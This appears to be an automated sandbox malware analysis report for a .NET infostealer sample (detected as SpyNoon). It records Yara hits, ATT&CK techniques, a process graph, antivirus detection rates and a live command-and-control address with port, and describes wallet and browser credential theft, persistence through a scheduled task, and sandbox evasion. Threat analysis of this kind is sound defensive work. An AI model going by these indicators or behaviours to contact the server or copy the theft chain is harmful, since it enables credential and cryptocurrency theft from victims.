                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 7.2.PO.exe.3c18d70.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c00f50.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c18d70.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.PO.exe.3c00f50.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: AJzHYZtQIb.exe PID: 5404, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter
                      1
                      Scheduled Task/Job
                      111
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      LSASS Memory3
                      File and Directory Discovery
                      Remote Desktop Protocol3
                      Data from Local System
                      11
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job
                      Logon Script (Windows)1
                      Scheduled Task/Job
                      4
                      Obfuscated Files or Information
                      Security Account Manager137
                      System Information Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook13
                      Software Packing
                      NTDS1
                      Query Registry
                      Distributed Component Object ModelInput Capture12
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets351
                      Security Software Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading
                      Cached Domain Credentials1
                      Process Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items241
                      Virtualization/Sandbox Evasion
                      DCSync241
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Process Injection
                      Proc Filesystem1
                      Application Window Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1457840 Sample: w4XFffGDz1.exe Startdate: 15/06/2024 Architecture: WINDOWS Score: 100 53 api.ip.sb 2->53 71 Found malware configuration 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 Sigma detected: Scheduled temp file as task from temp location 2->75 77 10 other signatures 2->77 9 w4XFffGDz1.exe 10 2->9         started        12 AJzHYZtQIb.exe 2->12         started        signatures3 process4 file5 47 C:\Users\user\AppData\Local\Temp\...\PO.exe, PE32 9->47 dropped 15 PO.exe 6 9->15         started        83 Multi AV Scanner detection for dropped file 12->83 85 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->85 87 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 12->87 89 Injects a PE file into a foreign processes 12->89 19 AJzHYZtQIb.exe 12->19         started        21 schtasks.exe 12->21         started        signatures6 process7 file8 49 C:\Users\user\AppData\...\AJzHYZtQIb.exe, PE32 15->49 dropped 51 C:\Users\user\AppData\Local\...\tmp61B0.tmp, XML 15->51 dropped 57 Multi AV Scanner detection for dropped file 15->57 59 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->59 61 Machine Learning detection for dropped file 15->61 69 4 other signatures 15->69 23 PO.exe 14 49 15->23         started        27 powershell.exe 23 15->27         started        29 powershell.exe 23 15->29         started        31 schtasks.exe 1 15->31         started        63 Found many strings related to Crypto-Wallets (likely being stolen) 19->63 65 Tries to harvest and steal browser information (history, passwords, etc) 19->65 67 Tries to steal Crypto Currency Wallets 19->67 33 conhost.exe 19->33         started        35 conhost.exe 21->35         started        signatures9 process10 dnsIp11 55 45.137.22.67, 49710, 49718, 49720 ROOTLAYERNETNL Netherlands 23->55 79 Tries to steal Crypto Currency Wallets 23->79 37 conhost.exe 23->37         started        81 Loading BitLocker PowerShell Module 27->81 39 conhost.exe 27->39         started        41 WmiPrvSE.exe 27->41         started        43 conhost.exe 29->43         started        45 conhost.exe 31->45         started        signatures12 process13

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      w4XFffGDz1.exe68%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
                      w4XFffGDz1.exe67%VirustotalBrowse
                      w4XFffGDz1.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe88%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
                      C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe58%VirustotalBrowse
                      C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe88%ReversingLabsByteCode-MSIL.Trojan.SpyNoon
                      C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe58%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      api.ip.sb0%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                      https://www.ecosia.org/newtab/0%URL Reputationsafe
                      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                      http://45.137.22.67:556150%Avira URL Cloudsafe
                      https://ipinfo.io/ip%appdata%0%Avira URL Cloudsafe
                      https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                      https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                      http://45.137.22.67:55615/0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%Avira URL Cloudsafe
                      https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                      http://45.137.22.67:55615/3%VirustotalBrowse
                      http://45.137.22.67:556153%VirustotalBrowse
                      http://schemas.datacontract.org/2004/07/0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/CheckConnectResponse0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%Avira URL Cloudsafe
                      https://ipinfo.io/ip%appdata%0%VirustotalBrowse
                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                      http://schemas.datacontract.org/2004/07/0%VirustotalBrowse
                      http://tempuri.org/Endpoint/EnvironmentSettings0%Avira URL Cloudsafe
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%Avira URL Cloudsafe
                      https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                      https://api.ip.sb/geoip0%VirustotalBrowse
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%VirustotalBrowse
                      http://tempuri.org/Endpoint/EnvironmentSettings2%VirustotalBrowse
                      https://api.ip.sb0%VirustotalBrowse
                      http://tempuri.org/Endpoint/CheckConnectResponse1%VirustotalBrowse
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%VirustotalBrowse
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%VirustotalBrowse
                      https://api.ip.sb/geoip0%Avira URL Cloudsafe
                      https://api.ip.sb0%Avira URL Cloudsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/CheckConnect0%Avira URL Cloudsafe
                      http://www.w3.or0%Avira URL Cloudsafe
                      http://tempuri.org/0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/00%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                      http://tempuri.org/0%VirustotalBrowse
                      http://tempuri.org/Endpoint/VerifyUpdateResponse1%VirustotalBrowse
                      http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/CheckConnect2%VirustotalBrowse
                      https://api.ipify.orgcookies//settinString.Removeg0%Avira URL Cloudsafe
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/00%VirustotalBrowse
                      http://schemas.xmlsoap.org/ws/2004/08/addressing0%Avira URL Cloudsafe
                      45.137.22.67:556150%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/GetUpdatesResponse0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                      45.137.22.67:556153%VirustotalBrowse
                      http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/GetUpdates1%VirustotalBrowse
                      http://tempuri.org/Endpoint/GetUpdatesResponse1%VirustotalBrowse
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponse1%VirustotalBrowse
                      http://schemas.xmlsoap.org/ws/2004/08/addressing0%VirustotalBrowse
                      http://tempuri.org/00%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironment1%VirustotalBrowse
                      http://45.137.22.67:55615t-0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/soap/actor/next0%Avira URL Cloudsafe
                      http://www.aforgenet.com/framework/0%Avira URL Cloudsafe
                      http://tempuri.org/Endpoint/SetEnvironmentResponse1%VirustotalBrowse
                      http://tempuri.org/00%VirustotalBrowse
                      http://schemas.xmlsoap.org/soap/actor/next0%VirustotalBrowse
                      http://tempuri.org/Endpoint/VerifyUpdate1%VirustotalBrowse
                      http://www.aforgenet.com/framework/0%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.ip.sb
                      unknown
                      unknowntrueunknown
                      NameMaliciousAntivirus DetectionReputation
                      http://45.137.22.67:55615/true
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      45.137.22.67:55615true
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ipinfo.io/ip%appdata%PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmptrue
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://45.137.22.67:55615PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.000000000347E000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/chrome_newtabtmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/ac/?q=tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icotmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousPO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/CheckConnectResponsePO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.datacontract.org/2004/07/PO.exe, 0000000E.00000002.2276292357.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXPO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/EnvironmentSettingsPO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sb/geoip%USERPEnvironmentROFILE%PO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sbAJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FFA000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.ip.sb/geoipAJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FFA000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/soap/envelope/AJzHYZtQIb.exe, 00000015.00000002.2357626482.000000000300B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.w3.orAJzHYZtQIb.exe, 00000010.00000002.2245706074.0000000002F69000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/AJzHYZtQIb.exe, 00000015.00000002.2357626482.000000000300B000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/CheckConnectPO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 2%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • URL Reputation: safe
                      unknown
                      https://www.ecosia.org/newtab/tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Endpoint/VerifyUpdateResponsePO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0PO.exefalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/SetEnvironmentAJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/SetEnvironmentResponsePO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/GetUpdatesAJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000003019000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://ac.ecosia.org/autocomplete?q=tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • URL Reputation: safe
                      unknown
                      https://api.ipify.orgcookies//settinString.RemovegPO.exe, PO.exe, 0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmptrue
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressingPO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/GetUpdatesResponsePO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • URL Reputation: safe
                      unknown
                      http://tempuri.org/Endpoint/EnvironmentSettingsResponsePO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/Endpoint/VerifyUpdatePO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://tempuri.org/0PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO.exe, 00000007.00000002.2160002789.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000010.00000002.2245706074.0000000003018000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp4887.tmp.21.dr, tmp4825.tmp.21.dr, tmp7F38.tmp.21.dr, tmp10D6.tmp.21.dr, tmp989A.tmp.14.dr, tmp10A5.tmp.21.dr, tmp4836.tmp.21.dr, tmp6270.tmp.14.dr, tmp98BA.tmp.14.dr, tmp4876.tmp.21.dr, tmp6291.tmp.14.dr, tmp4856.tmp.21.dr, tmp6280.tmp.14.dr, tmp9889.tmp.14.dr, tmp624F.tmp.14.dr, tmp1107.tmp.21.dr, tmp10C5.tmp.21.dr, tmp9838.tmp.14.dr, tmp9858.tmp.14.dr, tmp10F6.tmp.21.dr, tmp623F.tmp.14.drfalse
                      • URL Reputation: safe
                      unknown
                      http://45.137.22.67:55615t-AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://schemas.xmlsoap.org/soap/actor/nextPO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.aforgenet.com/framework/PO.exefalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      45.137.22.67
                      unknownNetherlands
                      51447ROOTLAYERNETNLtrue
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1457840
                      Start date and time:2024-06-15 20:21:09 +02:00
